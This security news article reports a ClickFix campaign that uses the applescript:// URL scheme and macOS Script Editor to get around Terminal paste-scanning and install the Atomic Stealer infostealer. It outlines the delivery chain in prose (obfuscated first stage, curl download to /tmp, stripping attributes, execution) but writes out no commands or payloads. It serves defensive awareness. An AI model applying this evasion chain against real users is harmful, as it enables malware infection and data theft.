The Script Editor Shift: How ClickFix Evades macOS 26.4 Security to Deliver Atomic Stealer

In the ever-evolving game of digital cat-and-mouse, Jamf Threat Labs has identified a clever adaptation of the notorious “ClickFix” attack strategy. Traditionally, these campaigns trick users into pasting malicious commands into the Terminal, but as security friction increases, threat actors are shifting their sights to a different built-in macOS tool: Script Editor.

This new campaign effectively sidesteps recent macOS security enhancements while maintaining the same dangerous endgame—infecting systems with the Atomic Stealer infostealer.

The hallmark of ClickFix has long been convincing a user to copy and paste a command into the Terminal under the guise of system maintenance. However, Apple introduced a specific security feature in macOS 26.4 that “scans commands pasted into Terminal before they’re executed,” creating a meaningful hurdle for attackers.

As Jamf Threat Labs notes, “when one door closes, attackers find another”. This campaign ditches the Terminal-based entry point entirely, instead leveraging the applescript:// URL scheme to automatically launch the macOS Script Editor.

The attack begins with a familiar social engineering lure, such as a fake browser update or a “fix” for a non-existent system error. When the victim follows the instructions, the following chain unfolds:

1. URL Scheme Invocation: The attacker uses a URL starting with applescript:// to force the system to open the Script Editor with a pre-loaded command.
2. The First Stage: The initial script is small and obfuscated, typically using “base64 encoding combined with gzip compression to obscure its contents before execution”.
3. The Retrieval: Once executed, this first stage runs a curl command to download a second-stage payload—identified as a Mach-O binary—to the /tmp directory.
4. Final Execution: The script then “removes extended attributes, sets execution permissions and executes” the binary, which Jamf has identified as a recent Atomic Stealer variant.

By shifting the execution environment, attackers gain two major advantages. First, they avoid the new “paste-and-scan” protections built into the macOS Terminal. Second, they maintain a “familiar delivery mechanism” while quietly changing how and where the malicious command actually runs.

This “small adjustment with a meaningful impact” allows the campaign to remain effective against users who may have been trained to be wary of the Terminal, but see the Script Editor as a more benign system tool.

As the researchers at Jamf conclude, this campaign is a “perfect illustration of the cat-and-mouse” nature of macOS security. By understanding these subtle pivots, users and administrators can stay one step ahead of the next ClickFix adaptation.